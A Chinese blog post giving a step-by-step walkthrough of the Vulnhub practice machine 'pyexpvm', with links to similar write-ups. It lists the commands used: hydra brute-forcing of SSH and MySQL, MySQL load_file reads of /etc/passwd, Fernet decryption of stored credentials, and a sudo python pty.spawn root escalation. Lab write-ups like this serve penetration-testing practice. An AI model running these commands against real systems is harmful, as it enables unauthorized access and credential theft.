pyexpvm靶机打靶过程及思路

已于 2022-07-22 18:12:35 修改
阅读量228 收藏
点赞数
文章标签: 网络安全
于 2022-05-18 15:15:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52610024/article/details/124843150
版权

1.常规端口及服务发现

2.没有开放web服务,但是开启了22端口的ssh服务以及mysql的3306端口

3.searchsploit搜索mysql版本拷贝下来但是没有得到结果
开始用hydra来尝试进行ssh爆破
hydra -l root -P rockyou.txt ssh://10.1.8.128:1337
破解失败,使用hydra对mysql进行爆破
hydra -l root -P rockyou.txt mysql://10.1.8.128
破解成功得到密码prettywoman

4.mysql尝试进行登录
mysql -u root -h 10.1.8.128 -p 输入密码连接成功
尝试使用! bash失败
select do_system(‘id’) 但是不存在这个函数
执行语句 select load_file(‘/etc/passwd’)发现一个名为lcuy的账号
尝试查看其他可以存在有效信息系统文件路径文件,查看lucy下的公钥文件也不存在

5.查看mysql数据库的表与数据,表名为fernet,是一种python下的加密算法
继续查看字段名里面存在一段密文和key,运行加密算法进行解密
from cryptography.fernet import Fernet
key = b’…’
f = Fernet(key)
token =b’…’
f.decrypt(token)
解密得到b’lucy:wj9`"Lemdv9[FEw-’

6.ssh登录lucy账号成功进入账号
uname -a内核版本提权失败
查看.bash_hsitory发现执行过/opt/exp.py
sudo -l 查看到exp这个py文件存在root权限文件
查看exp源码文件发现raw_input函数可以动态执行名
所以可以进行命令执行
放入以前用的提权语句
python -c ‘import pty;pty.spawn(“/bin/bash”)’

7.提权成功拿下root权限,打靶完成

zsszjybb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
学习笔记 vm虚拟机模拟实战打靶(永恒之蓝)
qq_52360932的博客
12-17 4952
1、查看靶机的ip地址:(即信息收集获取靶机ip,这里我直接在靶机内查看了ip地址,实际上应该进行信息收集获取ip) 2、返回启动kali,进入root,输入netdiscover(这一步是为了查看是否可以搜索到靶机ip) 3、发现靶机后,nmap扫描靶机,发现存在445端口(本人刚学习,使用永恒之蓝进行渗透) nmap -sV -O -A -T4 192.168.108.137 -sV版本识别 -O 是系统识别 -A 是进攻性扫描 -T4 是 以4级的速度扫描 4、启...
VnlnHub pyexpvm
weixin_45682839的博客
10-21 630
涉及知识:端口服务探测、密码爆破、mysql提权、加解密、linux本地提权
pyexp靶机总结
qq_45301512的博客
01-08 568
靶机下载地址:打开靶机.使用nmap扫描出靶机的ip和开放的端口可以看到,靶机开放了1337端口和3306端口1337端口是ssh的端口,3306是mysql数据库的端口根据之前做靶机的经验来看,一般是开放80端口,然后根据网站去找到合适的方法getshell,但是这里没有开放80端口,因此只能考虑1337端口和3306端口那么先对这两个端口进行爆破一波,看是否能爆破出登录的密码由于不知道存在什么用户,因此只能先尝试root用户的爆破。
实战打靶集锦-30-pyexpvm
最新发布
阿尔泰野狼的博客
03-31 994
本文记录了博主的一次打靶经历,涉及mysql渗透,密码爆破,fernet加解密等。
vulnhub之pyexp
weixin_54431413的博客
06-26 375
主要学习了如何不从web应用突破边界,hydra暴力破解拿到mysql权限:一、进行系统层面的攻击(do_system(),load_file(),\!),二、对数据库信息的分析。python的加解密算法的应用。利用sudo 配置问题的进行提权。...
安装vulhub靶机过程
05-03
安装vulhub靶机过程网络安全领域中,安装vulhub靶机是一个非常重要的步骤。Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加...
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
渗透测试新手练习及高手深入挖掘专用Linux及Windows靶机(官方原版镜像)
05-08
metasploitable-linux为常用的Linux靶机,系统包含了很多高风险漏洞、弱口令及容易利用的端口、服务,是渗透测试初学者练习技术的不二之选。 Windows_xp_pro_with_sp2就更不用说了,都被人挖烂了,sp2版本相比sp3更...
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
web渗透测试靶机(新手)
05-07
在这个过程中,测试者模拟攻击者的行为,试图绕过系统的防护措施,以识别可能被恶意攻击者利用的弱点。 "626包厢"可能是一个虚拟机或靶场环境的名字,其中包含了多个Web应用程序,用于实践SQL注入、跨站脚本(XSS)...
vulnhub -- pyexp
weixin_46107179的博客
05-16 384
靶机下载链接:下载地址 下载完成后解压,用VMware打开 主机发现 通过arp-scan -l 来发现主机是否存活 信息收集 通过nmap扫描主机开放端口1337和3306,并没有熟悉的80端口 通过searchsploit搜索相关的漏洞利用,发现好像并不能打点成功,接下来只有进行爆破 对ssh和mysql同时进行爆破,发现mysql爆破成功,获取到密码 然后进行登录mysql,尝试执行系统命令,发现不行 尝试读取文件,发现可以通过load_file读取文件,用select load_file(‘
Python解决打靶问题
wei
09-29 1784
原帖见:http://blog.csdn.net/d8111/archive/2008/09/21/2956832.aspx动态语言永远是那么的飘逸。就似绝世神剑。高手用来心中有剑,低手则走火入魔。from time import timedef shot(n, remain, his):        """n goes 0-9"""        if(rema
python打靶问题,递归算法
Mtostart
01-22 2696
python打靶问题,递归算法问题描述思路代码运行结果 问题描述 一个射击运动员打靶,靶一共有10环,连开6枪打中45环的可能性有多少种?(每一枪的成绩,最少是0环,最多是10环) 思路 一共开6抢 如果第6枪打i1环,那么剩下5枪一共要打(45-i1)环 如果第5枪打i2环,那么剩下4枪一共要打(45-i1-i2)环 …… 以此类推,将问题的规模减小 f(n-1,sum+i) 如果最后一枪打完且...
打靶问题
chenglinhust的专栏
12-02 1639
打靶问题       题目:一个射击运动员打靶,靶一共有10环,连开10 枪打中90环的可能性有多少?     分析:这道题与字符串的组合原理相似,可以利用递归的方法来解决。每次打靶命中的结果有11种,命中1-10环,或者脱靶(设为命中0环)。参考:本博客《字符串的全排列和组合算法》。     测试代码如下: #include #include using namespace
【算法】打靶问题求解
weixin_33965305的博客
02-01 164
问题描写叙述:打一枪可能的环数为0~10,求打10枪总环数为90的概率。 这是一道排列组合问题。能够用循环加递归的方法解决。比方,第一次能够打出0~10环,那么先固定第一次打的环数。然后加上剩下的九次打的环数。就得到总环数。而剩下九次的环数通过递归非常easy求得。代码例如以下: #include <iostream> using namespace std; int ...
Python练习题答案: 挑战乐趣#14:打靶游戏【难度:3级】--景越Python编程实例训练营,1000道上机题等你来挑战
景越Python编程实例训练营
10-26 369
挑战乐趣#14:打靶游戏【难度:3级】: 答案1: def target_game(values): a = b = 0 for n in values: a, b = b, max(a + n, b) return max(a, b)​ 答案2: def target_game(values): # your code goes here ...
用python来解 PAT乙级1082射击比赛 -20-满分
pythonuser1的博客
08-31 624
题意很简单,输入运动员的编号和射出箭的坐标,对比他们到圆心的距离,输出最近的(冠军)和最远的(菜鸟)编号 直接用求三角形最长边的计算公式对每一个坐标求距离,先设两个常量分别是0和200(任意设置一个不可能达到的距离就可),然后遍历过程中替代他们,最后输出 代码如下: n = int(input()) res = '0000 0000'#先定输出结果 max_dis = 0 min_dis = 200#设置两个边界的常量 # num_dis = dict()#也可以用字典 for i in range
使用zabbix监控VMware
blackawhite的博客
04-14 6041
VMware本身报警可以在vcenter中获取到,但无法通过微信或者短信通知,如果不是专门人负责也不好24小时一直查看,所以使用监控软件进行实时监控,很有必要。zabbix是一款开源监控软件,功能强大,内置很多的监控模板,还可以根据自己的需求定制模板,使用起来非常方便
一起来打靶 01
cmdos的专栏
03-21 734
0x00 靶机介绍靶机地址:BoredHackerBlog: Social Network ~ VulnHub靶机难度:中推荐虚拟机:VirtualBox0x01 内容简介涉及的攻击方法主机发现端口扫描服务发现路径爬取代码注入Shell脚本内网信息收集内网穿透漏洞利用密码破解本地提权攻击代码修改0x02 环境搭建下载好靶机.ova文件后导入到VirtualBox中即可确保靶机和kali在同一网段中kali IP地址:10.0.2.50x03 信息收集因为靶机和kali在同一网段中,所以优先选择二层的主机发现
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放...以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值